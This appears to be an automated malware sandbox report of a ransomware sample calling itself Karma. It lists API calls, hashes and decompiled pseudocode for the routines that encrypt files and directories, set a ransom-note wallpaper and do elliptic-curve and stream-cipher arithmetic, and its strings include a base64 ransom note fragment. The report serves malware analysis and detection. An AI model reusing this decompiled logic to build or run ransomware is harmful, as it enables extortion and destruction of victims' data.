  • WriteConsoleW.KERNELBASE(00000000,?,00000000), ref: 00401E84
  • LoadLibraryA.KERNELBASE(crypt32.dll,?,00000000), ref: 00401EA5
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401EC2
  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00401F05
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 00401F0C
  • LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401F29
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401F42
  • LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401F81
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401F98
  • GetProcessHeap.KERNEL32(00000000,00000001,?,00000000), ref: 00401FD7
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 00401FDE
  • LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401FFB
  • GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00402014
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: AddressHeapLibraryLoadProc$AllocProcess$ConsoleHandleWrite
  • String ID: 38NFiLYfbhFc35sxdKxIJz8GZRTH+jBX8EUbjT8AAACdsfa4+Mfat5MB7M6iCYGuaz+QPBRwoPC+x4xl1QAAAA==$CryptStringToBinaryW$WW91ciBuZXR3b3JrIGhhcyBiZWVuIGJyZWFjaGVkIGJ5IEthcm1hIHJhbnNvbXdhcmUgZ3JvdXAuDQpXZSBoYXZlIGV4dHJhY3RlZCB2YWx1YWJsZSBvciBzZW5zaXRpdm$[+] Trying to import ECC public key...$crypt32.dll$hC@
  • API String ID: 238319377-622750579
  • Opcode ID: 2180c5b2d04714ec5efb67d5ea94fba3e0a293ac2c853ad166c9bb5c839e750b
  • Instruction ID: 9e063415e7eda99132234e8214f4e216244cd9a1266f3e5cb94004aefb5f967e
  • Opcode Fuzzy Hash: 2180c5b2d04714ec5efb67d5ea94fba3e0a293ac2c853ad166c9bb5c839e750b
  • Instruction Fuzzy Hash: 9861B5B4650304AEDB24EFA4DD45B6777B8EB84700F11817EEA06F72E0EBB459508B98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			_entry_() {
				char _v8;
				void _v528;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				long _t32;
				long _t37;
				signed int* _t56;
				signed short* _t57;
				signed int* _t58;
				void* _t71;
				char* _t72;
				void* _t83;
				void* _t84;

				_t56 =  &_v528 - 2;
				_t28 = (L"[+] Checking if already started..." -  &_v528 >> 1) + 1;
				_t71 = (L"[+] Checking if already started..." -  &_v528 >> 1) + 1 + _t28;
				do {
					_t29 =  *(_t71 + _t56) & 0x0000ffff;
					_t56 =  &(_t56[0]);
					 *_t56 = _t29;
				} while (_t29 != 0);
				_t57 =  &_v528;
				_t72 = "\n";
				do {
					_t30 =  *_t57 & 0x0000ffff;
					_t57 =  &(_t57[1]);
				} while (_t30 != 0);
				_t58 = _t57 - 4;
				do {
					_t31 =  *_t72 & 0x0000ffff;
					_t58 =  &(_t58[0]);
					 *_t58 = _t31;
					_t8 =  &(_t72[2]); // 0x414b0000
					_t72 = _t8;
				} while (_t31 != 0);
				_t32 = 0;
				if(_v528 == 0) {
					L9:
					WriteConsoleW(GetStdHandle(0xfffffff5),  &_v528, _t32, 0, 0); // executed
					CreateMutexA(0, 0, "KARMA"); // executed
					_t37 = GetLastError();
					if(_t37 == 0xb7) {
						return _t37;
					}
					 *0x406000 = E00402280();
					E004021B0(L"[+] Getting argument list...", 0); // executed
					_t83 = E00402070(GetCommandLineW(),  &_v8);
					if(_v8 <= 1) {
						E00401DF0(); // executed
						E004021B0(L"[+] Starting all threads...", 0); // executed
						E004035D0(); // executed
					} else {
						E004021B0(L"   [-] Argument: ",  *((intOrPtr*)(_t83 + 4)));
						if(E00401D60( *((intOrPtr*)(_t83 + 4))) == 0) {
							E00401DF0();
							E004021B0(L"[+] Encrypting file: ",  *((intOrPtr*)(_t83 + 4)));
							E00402760( *((intOrPtr*)(_t83 + 4)));
						} else {
							E00401DF0();
							E00401D10( &_v528,  *((intOrPtr*)(_t83 + 4)));
							E00401D30( &_v528, "\\");
							E004021B0(L"[+] Encrypting directory: ",  &_v528);
							E00402D30( &_v528);
						}
					}
					_t37 = E00402320();
					ExitProcess(0);
				}
				do {
					_t32 = _t32 + 1;
				} while ( *((short*)(_t84 + _t32 * 2 - 0x20c)) != 0);
				goto L9;
			}

APIs
  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000), ref: 00401BFA
  • WriteConsoleW.KERNELBASE(00000000), ref: 00401C01
  • CreateMutexA.KERNELBASE(00000000,00000000,KARMA), ref: 00401C10
  • GetLastError.KERNEL32 ref: 00401C16
  • GetCommandLineW.KERNEL32 ref: 00401C3D
  • ExitProcess.KERNEL32 ref: 00401CE7
    • Part of subcall function 00401DF0: GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000,?,00000000), ref: 00401E7D
    • Part of subcall function 00401DF0: WriteConsoleW.KERNELBASE(00000000,?,00000000), ref: 00401E84
    • Part of subcall function 00401DF0: LoadLibraryA.KERNELBASE(crypt32.dll,?,00000000), ref: 00401EA5
    • Part of subcall function 00401DF0: GetProcAddress.KERNEL32(?,CryptStringToBinaryW), ref: 00401EC2
    • Part of subcall function 00401DF0: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00401F05
    • Part of subcall function 00401DF0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 00401F0C
    • Part of subcall function 00401DF0: LoadLibraryA.KERNEL32(crypt32.dll,?,00000000), ref: 00401F29
    • Part of subcall function 004021B0: GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000), ref: 0040226A
    • Part of subcall function 004021B0: WriteConsoleW.KERNELBASE(00000000), ref: 00402271
    • Part of subcall function 00402760: CreateFileW.KERNELBASE(?,C0000000), ref: 0040278D
    • Part of subcall function 00402760: GetFileSizeEx.KERNEL32(00000000,00000003), ref: 004027A7
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004027D0
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 004027D9
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000008), ref: 004027E3
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 004027E6
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027F0
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 004027F3
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027FD
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 00402800
    • Part of subcall function 00402760: GetProcessHeap.KERNEL32(00000000,00000020), ref: 0040280C
    • Part of subcall function 00402760: HeapAlloc.KERNEL32(00000000), ref: 0040280F
    • Part of subcall function 00402760: LoadLibraryW.KERNELBASE(bcrypt.dll), ref: 0040282A
    • Part of subcall function 00402760: GetProcAddress.KERNEL32(?,BCryptGenRandom), ref: 00402847
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: Heap$Process$Alloc$ConsoleHandleLibraryLoadWrite$AddressCreateFileProc$CommandErrorExitLastLineMutexSize
  • String ID: [-] Argument: $(B@$KARMA$[+] Checking if already started...$[+] Encrypting directory: $[+] Encrypting file: $[+] Getting argument list...$[+] Starting all threads...$hC@
  • API String ID: 3945073371-3735026340
  • Opcode ID: 01816b0811a6cb24de3ab987ac90751fb743111bb3ef22becbe281bafd49813a
  • Instruction ID: bfc79cb6b1bf02a545a08266bbec62af52f98c871f437353d0285555aeb6d5ed
  • Opcode Fuzzy Hash: 01816b0811a6cb24de3ab987ac90751fb743111bb3ef22becbe281bafd49813a
  • Instruction Fuzzy Hash: 8341B6706002048BC714BBB5C94976A7375EF84344F10C6BFFA16B72E2DB78AD418B59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 96%
			E004021B0(void* __ecx, signed short* __edx) {
				void _v524;
				signed int _t17;
				signed short* _t18;
				signed int* _t19;
				long _t20;
				int _t23;
				signed int _t24;
				signed int _t25;
				void* _t30;
				signed int _t31;
				signed int _t32;
				signed short* _t33;
				signed int* _t34;
				signed short* _t35;
				char* _t36;
				signed int* _t39;
				void* _t41;

				_t35 = __edx;
				_t39 =  &_v524 - 2;
				_t30 = (__ecx -  &_v524 >> 1) + 1 + (__ecx -  &_v524 >> 1) + 1;
				do {
					_t17 =  *(_t30 + _t39) & 0x0000ffff;
					_t39 =  &(_t39[0]);
					 *_t39 = _t17;
				} while (_t17 != 0);
				if(__edx != 0) {
					_t33 =  &_v524;
					asm("o16 nop [eax+eax]");
					do {
						_t24 =  *_t33 & 0x0000ffff;
						_t33 =  &(_t33[1]);
					} while (_t24 != 0);
					_t34 = _t33 - 4;
					do {
						_t25 =  *_t35 & 0x0000ffff;
						_t34 =  &(_t34[0]);
						 *_t34 = _t25;
						_t35 =  &(_t35[1]);
					} while (_t25 != 0);
				}
				_t18 =  &_v524;
				_t36 = "\n";
				do {
					_t31 =  *_t18 & 0x0000ffff;
					_t18 =  &(_t18[1]);
				} while (_t31 != 0);
				_t19 = _t18 - 4;
				do {
					_t32 =  *_t36 & 0x0000ffff;
					_t19 =  &(_t19[0]);
					 *_t19 = _t32;
					_t10 =  &(_t36[2]); // 0x414b0000
					_t36 = _t10;
				} while (_t32 != 0);
				_t20 = 0;
				if(_v524 != 0) {
					do {
						_t20 = _t20 + 1;
					} while ( *((short*)(_t41 + _t20 * 2 - 0x208)) != 0);
				}
				_t23 = WriteConsoleW(GetStdHandle(0xfffffff5),  &_v524, _t20, 0, 0); // executed
				return _t23;
			}

APIs
  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000000,00000000), ref: 0040226A
  • WriteConsoleW.KERNELBASE(00000000), ref: 00402271
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: ConsoleHandleWrite
  • String ID: hC@
  • API String ID: 2389571490-336404188
  • Opcode ID: 4a04f29e1ff0a26ba3bd12c14a1590599b0b93a548b6a486ac76467ac11fc1d3
  • Instruction ID: 26736e671d14f07e881d139068675f2870b8e4ac510383da8d16ca214fc7205d
  • Opcode Fuzzy Hash: 4a04f29e1ff0a26ba3bd12c14a1590599b0b93a548b6a486ac76467ac11fc1d3
  • Instruction Fuzzy Hash: 7E21D1358002168ACB24AFA4C949BB3B374FF45304F1582EEED96B71D1FB74AA85C758
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Control-flow Graph

C-Code - Quality: 92%
			E00402320() {
				short _v532;
				WCHAR* _v620;
				struct tagSIZE _v668;
				signed int _v684;
				struct tagRECT _v720;
				short _v732;
				intOrPtr _v734;
				intOrPtr _v738;
				int _v742;
				void _v744;
				struct HFONT__* _v752;
				void* _v756;
				void* _v760;
				struct HDC__* _v772;
				int _v784;
				int _v788;
				int _v792;
				struct HDC__* _v796;
				int _v800;
				int _v804;
				struct HDC__* _v808;
				int _v812;
				void _v816;
				long _v820;
				struct HDC__* _v824;
				struct HDC__* _v828;
				struct HDC__* _v832;
				struct HDC__* _v836;
				struct HDC__* _v840;
				int _v844;
				int _v848;
				int _v852;
				long _v872;
				intOrPtr _v884;
				struct HDC__* _v888;
				void _v892;
				intOrPtr _v896;
				struct HDC__* _v900;
				void* _v904;
				long _v908;
				struct HDC__* _v916;
				struct HDC__* _v928;
				intOrPtr _v944;
				struct HDC__* _v948;
				int _v960;
				struct HDC__* _v964;
				intOrPtr _v976;
				int _v992;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				struct HDC__* _t100;
				void* _t110;
				int _t116;
				signed int _t120;
				struct HDC__* _t121;
				int _t129;
				signed short* _t159;
				signed int* _t160;
				void* _t165;
				int _t166;
				struct HDC__* _t168;
				int _t169;
				signed short* _t170;
				signed int* _t171;
				intOrPtr _t172;
				WCHAR* _t174;
				struct HDC__* _t175;
				void* _t176;
				int _t178;
				struct HDC__* _t180;
				int _t182;
				struct HDC__* _t185;
				struct HDC__* _t186;
				int _t190;

				GetTempPathW(0x104,  &_v532);
				_t159 =  &_v532;
				_t170 = L"background.jpg";
				do {
					_t94 =  *_t159 & 0x0000ffff;
					_t159 =  &(_t159[1]);
				} while (_t94 != 0);
				_t160 = _t159 - 4;
				do {
					_t95 =  *_t170 & 0x0000ffff;
					_t160 =  &(_t160[0]);
					 *_t160 = _t95;
					_t170 =  &(_t170[1]);
				} while (_t95 != 0);
				_t174 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				_v620 = _t174;
				_t6 = _t174 - 2; // -2
				_t171 = _t6;
				_t165 = (L"\n\nPLEASE, READ KARMA-ENCRYPTED" - _t174 >> 1) + 1 + (L"\n\nPLEASE, READ KARMA-ENCRYPTED" - _t174 >> 1) + 1;
				asm("o16 nop [eax+eax]");
				do {
					_t98 =  *(_t165 + _t171) & 0x0000ffff;
					_t171 =  &(_t171[0]);
					 *_t171 = _t98;
				} while (_t98 != 0);
				_v752 = CreateFontW(0x2d, 0, 0, 0, 0x190, 0, 0, 0, 1, 2, 0, 0, 0, L"Leelawadee");
				_t100 = GetDC(0);
				_v756 = _t100;
				_t180 = CreateCompatibleDC(_t100);
				_v772 = _t180;
				SelectObject(_t180, _v756);
				_t166 = 0;
				if( *_t174 != 0) {
					do {
						_t166 = _t166 + 1;
					} while (_t174[_t166] != 0);
				}
				GetTextExtentPoint32W(_t180, _t174, _t166,  &_v668);
				_v684 = _v684 + 0x00000003 & 0xfffffffc;
				_v800 = GetSystemMetrics(0);
				_t182 = GetSystemMetrics(1);
				_t110 = CreateCompatibleBitmap(_v796, _v800, _t182);
				_v720.left = _t110;
				SelectObject(_v808, _t110);
				SetTextColor(_v816, 0xffffff);
				SetBkMode(_v824, 2);
				SetBkColor(_v832, 0);
				_v720.right = _v844;
				_t116 = 0;
				_v720.top = 0;
				_v720.left = 0;
				_v720.bottom.bmiHeader = _t182;
				if( *_t174 != 0) {
					do {
						_t116 = _t116 + 1;
					} while (_t174[_t116] != 0);
				}
				DrawTextW(_v840, _t174, _t116,  &_v720, 0x211);
				_v812 = _t182;
				_v744 = 0x4d42;
				_v738 = 0;
				_t120 = _v844;
				_v820 = 0x28;
				_v816 = _t120;
				_v808 = 0x100001;
				asm("movups xmm0, [esp+0x24]");
				_v804 = 0;
				_v800 = _t182 * _t120 + _t182 * _t120;
				asm("movups [esp+0x98], xmm0");
				_v796 = 0;
				_v792 = 0;
				asm("movups xmm0, [esp+0x34]");
				_v788 = 0;
				_v784 = 0;
				asm("movups [esp+0xa8], xmm0");
				_v742 = 0;
				asm("movq xmm0, [esp+0x44]");
				_v734 = 0x36;
				asm("movq [esp+0xb8], xmm0");
				_t121 = CreateCompatibleDC(_v828);
				_t185 = _v844;
				_t175 = _t121;
				_v836 = _t175;
				SelectObject(_t175, CreateDIBSection(_t185,  &(_v720.bottom), 0,  &_v760, 0, 0));
				BitBlt(_t175, 0, 0, _v852, _v848, _t185, 0, 0, 0xcc0020);
				_t186 = _v888;
				if(_t186 > 0) {
					_t172 = _v884;
					_t168 = 0xfffffffd;
					_v916 = 0xfffffffd;
					do {
						if(_t172 > 0) {
							_t190 = 3;
							do {
								_t60 = _t190 - 3; // 0x0
								_t169 = _t168 + 3;
								_v832 = _t169;
								if(GetPixel(_t175, _t169, _t60) == 0) {
									_t62 = _t190 - 3; // 0x0
									SetPixel(_t175, _v844, _t62, 0xc3c3c3);
									SetPixel(_t175, _v944 + 6, _t190, 0xc3c3c3);
									_t65 = _t190 - 6; // -3
									_t178 = _t65;
									SetPixel(_v948, _v960, _t178, 0xc3c3c3);
									_t175 = _v964;
									SetPixel(_t175, _v976 + 6, _t178, 0xc3c3c3);
									SetPixel(_t175, _v992, _t190, 0xc3c3c3);
								}
								_t172 = _v896;
								_t190 = _t190 + 0xc;
								_t168 = _v928;
								_t73 = _t190 - 3; // -12
							} while (_t73 < _t172);
							_t186 = _v900;
						}
						_t168 = _t168 + 0xc;
						_v916 = _t168;
						_t76 =  &(_t168->i); // 0xfffffff4
					} while (_t76 < _t186);
				}
				ReleaseDC(0, _v900);
				_t129 = CreateFileW( &_v732, 0x40000000, 0, 0, 4, 0x80, 0);
				_t176 = _t129;
				if(_t176 != 0xffffffff) {
					_v908 = 0;
					WriteFile(_t176,  &_v816, 0xe,  &_v908, 0);
					WriteFile(_t176,  &_v892, 0x28,  &_v908, 0);
					WriteFile(_t176, _v828, _v872,  &_v908, 0);
					CloseHandle(_t176);
					DeleteObject(_v824);
					DeleteDC(_v916);
					DeleteObject(_v904);
					HeapFree(GetProcessHeap(), 0, _v832);
					_t129 = SystemParametersInfoW(0x14, 0,  &_v744, 1);
				}
				return _t129;
			}

APIs
  • GetTempPathW.KERNEL32(00000104,?,?,00000000), ref: 0040233B
  • GetProcessHeap.KERNEL32(00000008,00000800,?,00000000), ref: 00402378
  • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040237F
  • CreateFontW.GDI32(0000002D,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000002,00000000,00000000,00000000,Leelawadee,?,00000000), ref: 004023D1
  • GetDC.USER32(00000000), ref: 004023DD
  • CreateCompatibleDC.GDI32(00000000), ref: 004023E8
  • SelectObject.GDI32(00000000,?), ref: 004023F9
  • GetTextExtentPoint32W.GDI32(00000000,00000000,00000000,?), ref: 00402416
  • GetSystemMetrics.USER32 ref: 00402435
  • GetSystemMetrics.USER32 ref: 0040243D
  • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040244A
  • SelectObject.GDI32(?,00000000), ref: 00402459
  • SetTextColor.GDI32(?,00FFFFFF), ref: 00402468
  • SetBkMode.GDI32(?,00000002), ref: 00402474
  • SetBkColor.GDI32(?,00000000), ref: 00402480
  • DrawTextW.USER32(?,00000000,00000000,00000000,00000211), ref: 004024D0
  • CreateCompatibleDC.GDI32(?), ref: 00402570
  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00402594
  • SelectObject.GDI32(00000000,00000000), ref: 0040259C
  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004025B9
  • GetPixel.GDI32(00000000,FFFFFFFA,00000000), ref: 004025F2
  • SetPixel.GDI32(00000000,?,00000000,00C3C3C3), ref: 0040260A
  • SetPixel.GDI32(00000000,?,00000003,00C3C3C3), ref: 0040261F
  • SetPixel.GDI32(?,?,-00000003,00C3C3C3), ref: 00402636
  • SetPixel.GDI32(?,?,-00000003,00C3C3C3), ref: 0040264F
  • SetPixel.GDI32(?,?,00000003,00C3C3C3), ref: 00402660
  • ReleaseDC.USER32 ref: 00402698
  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 004026B8
  • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 004026E6
  • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 004026F7
  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402709
  • CloseHandle.KERNEL32(00000000), ref: 0040270C
  • DeleteObject.GDI32(?), ref: 0040271C
  • DeleteDC.GDI32(?), ref: 00402722
  • DeleteObject.GDI32(00000000), ref: 0040272C
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402734
  • HeapFree.KERNEL32(00000000), ref: 0040273B
  • SystemParametersInfoW.USER32 ref: 0040274F
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: CreatePixel$Object$FileHeap$CompatibleDeleteSelectSystemTextWrite$ColorMetricsProcess$AllocBitmapCloseDrawExtentFontFreeHandleInfoModeParametersPathPoint32ReleaseSectionTemp
  • String ID: PLEASE, READ KARMA-ENCRYPTED$($6$Leelawadee$background.jpg
  • API String ID: 3363958648-3336038800
  • Opcode ID: 1d194a35e65f405323fdeca169d2d71cef0578acbaf7fb9668695732de5b653b
  • Instruction ID: ee4b26a5c427de9d116df7c20ce1b3aa9ba1370223ff4adb59bd260217b64008
  • Opcode Fuzzy Hash: 1d194a35e65f405323fdeca169d2d71cef0578acbaf7fb9668695732de5b653b
  • Instruction Fuzzy Hash: 8AC13A71548301AFE7209F60DD49B6BBBE8FF88714F10892DF784B62E0D7B499448B5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 79%
			E004015A0(signed int* __ecx, signed int* __edx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v76;
				char _v108;
				char _v140;
				signed int* _t96;
				void* _t103;
				void* _t104;
				signed int* _t105;
				void* _t108;
				void* _t109;
				signed int _t116;
				signed int _t118;
				signed int* _t120;
				signed int _t126;
				void* _t129;
				signed int _t133;
				signed int _t134;
				intOrPtr _t136;
				void* _t140;
				void* _t141;
				void* _t145;
				signed int _t150;
				signed int _t153;
				signed int _t169;
				signed int* _t171;
				signed int* _t173;
				void* _t180;
				signed int* _t182;
				signed int* _t183;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t198;

				_t183 = __edx;
				_t182 = __ecx;
				_t171 = _a4;
				_t133 = 0;
				while(1) {
					_t96 = _a8;
					if(_t171[_t133] != 0) {
						break;
					}
					_t133 = _t133 + 1;
					_t189 = _t133 - 8;
					if(_t189 < 0) {
						continue;
					} else {
						if(_t189 == 0) {
							_t169 = 0;
							while(_t96[_t169] == 0) {
								_t169 = _t169 + 1;
								_t192 = _t169 - 8;
								if(_t192 < 0) {
									continue;
								} else {
									if(_t192 == 0) {
										return _t96;
									} else {
										goto L8;
									}
								}
								goto L41;
							}
						}
						break;
					}
					L41:
				}
				L8:
				_t134 = 0;
				while(_t182[_t134] == 0) {
					_t134 = _t134 + 1;
					_t195 = _t134 - 8;
					if(_t195 < 0) {
						continue;
					} else {
						if(_t195 == 0) {
							_t153 = 0;
							while(_t183[_t153] == 0) {
								_t153 = _t153 + 1;
								_t198 = _t153 - 8;
								if(_t198 < 0) {
									continue;
								} else {
									if(_t198 != 0) {
										goto L17;
									} else {
										 *_t182 =  *_t171;
										_t182[1] = _t171[1];
										_t182[2] = _t171[2];
										_t182[3] = _t171[3];
										_t182[4] = _t171[4];
										_t182[5] = _t171[5];
										_t182[6] = _t171[6];
										_t182[7] = _t171[7];
										 *_t183 =  *_t96;
										_t183[1] = _t96[1];
										_t183[2] = _t96[2];
										_t183[3] = _t96[3];
										_t183[4] = _t96[4];
										_t183[5] = _t96[5];
										_t118 = _t96[7];
										_t183[6] = _t96[6];
										_t183[7] = _t118;
										return _t118;
									}
								}
								goto L41;
							}
						}
						break;
					}
					goto L41;
				}
				L17:
				_v8 = 0;
				_t136 = _t182 - _t171;
				_t120 = _t171;
				_v12 = _t136;
				while( *((intOrPtr*)(_t136 + _t120)) ==  *_t120) {
					_t120 =  &(_t120[1]);
					_t150 = _v8 + 1;
					_v8 = _t150;
					_t136 = _v12;
					if(_t150 < 8) {
						continue;
					}
					_t180 = 0;
					_t129 = _t183 - _t96;
					while( *((intOrPtr*)(_t129 + _t96)) ==  *_t96) {
						_t180 = _t180 + 1;
						_t96 =  &(_t96[1]);
						if(_t180 < 8) {
							continue;
						} else {
							return E00401480(_t182, _t183);
						}
						goto L41;
					}
					 *_t182 = 0;
					_t182[1] = 0;
					_t182[2] = 0;
					_t182[3] = 0;
					_t182[4] = 0;
					_t182[5] = 0;
					_t182[6] = 0;
					_t182[7] = 0;
					 *_t183 = 0;
					_t183[1] = 0;
					_t183[2] = 0;
					_t183[3] = 0;
					_t183[4] = 0;
					_t183[5] = 0;
					_t183[6] = 0;
					_t183[7] = 0;
					return _t96;
					goto L41;
				}
				_v8 =  &_v108 - _t96;
				_t140 = 2;
				do {
					_t96 =  &(_t96[4]);
					asm("movups xmm1, [eax+ebx-0x10]");
					asm("movups xmm0, [eax-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [edx+eax-0x10], xmm1");
					_t140 = _t140 - 1;
				} while (_t140 != 0);
				_t173 = _a4;
				_t141 = 2;
				do {
					_t173 =  &(_t173[4]);
					asm("movups xmm1, [edx+eax-0x10]");
					asm("movups xmm0, [edx-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebx+edx-0x10], xmm1");
					_t141 = _t141 - 1;
				} while (_t141 != 0);
				E00401240( &_v76,  &_v140);
				E004010F0( &_v76,  &_v76,  &_v108);
				E004010F0( &_v44,  &_v76,  &_v76);
				_t103 = 0;
				do {
					asm("movups xmm0, [ebp+eax-0x28]");
					asm("movups xmm1, [ebp+eax-0x48]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebp+eax-0x28], xmm1");
					_t103 = _t103 + 0x10;
				} while (_t103 < 0x20);
				_t104 = 0;
				do {
					asm("movups xmm0, [ebp+eax-0x28]");
					asm("movups xmm1, [ebp+eax-0x88]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebp+eax-0x28], xmm1");
					_t104 = _t104 + 0x10;
				} while (_t104 < 0x20);
				_t126 = _v44 ^ 0x00000001;
				_t105 = _t182;
				_v44 = _t126;
				_t145 = 2;
				do {
					_t105 =  &(_t105[4]);
					asm("movups xmm0, [eax-0x10]");
					asm("movups xmm1, [edx+eax-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [eax-0x10], xmm1");
					_t145 = _t145 - 1;
				} while (_t145 != 0);
				E004010F0( &_v108, _t182,  &_v76);
				_t108 = 0;
				do {
					asm("movups xmm0, [ebp+eax-0x68]");
					asm("movups xmm1, [ebp+eax-0x28]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebp+eax-0x68], xmm1");
					_t108 = _t108 + 0x10;
				} while (_t108 < 0x20);
				_t109 = 2;
				asm("o16 nop [eax+eax]");
				do {
					_t183 =  &(_t183[4]);
					asm("movups xmm0, [esi-0x10]");
					asm("movups xmm1, [ecx+esi-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [esi-0x10], xmm1");
					_t109 = _t109 - 1;
				} while (_t109 != 0);
				_t182[1] = _v40;
				_t182[2] = _v36;
				_t182[3] = _v32;
				_t182[4] = _v28;
				_t182[5] = _v24;
				_t182[6] = _v20;
				_t116 = _v16;
				 *_t182 = _t126;
				_t182[7] = _t116;
				return _t116;
			}

Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 8cb74fc443f393d4937114ad28006b61f474509722a6e899e2b7741a24204fdc
  • Instruction ID: 0562f3e263282b1222dac1fc98c5a5a7ec445371b79d9260e02e3a38dc2343f8
  • Opcode Fuzzy Hash: 8cb74fc443f393d4937114ad28006b61f474509722a6e899e2b7741a24204fdc
  • Instruction Fuzzy Hash: A7B1A1709006098FDB18CF28D591BA9F7B0FF99304F14C66ED849A77A2DB74A9C4CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
			E00403780(signed int* __ecx) {
				signed int _t54;
				signed int _t60;
				signed int _t66;
				signed int _t72;
				signed int _t74;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;

				_t85 =  *__ecx;
				_t89 = __ecx[0xc];
				asm("rol eax, 0x7");
				__ecx[4] = __ecx[4] ^ _t85 + _t89;
				_t77 = __ecx[4];
				asm("rol eax, 0x9");
				__ecx[8] = __ecx[8] ^ _t77 + _t85;
				_t81 = __ecx[8];
				asm("rol eax, 0xd");
				_t54 = _t81 + _t77 ^ _t89;
				_t90 = __ecx[1];
				__ecx[0xc] = _t54;
				asm("ror eax, 0xe");
				_t86 = __ecx[5];
				 *__ecx = _t54 + _t81 ^ _t85;
				asm("rol eax, 0x7");
				__ecx[9] = __ecx[9] ^ _t86 + _t90;
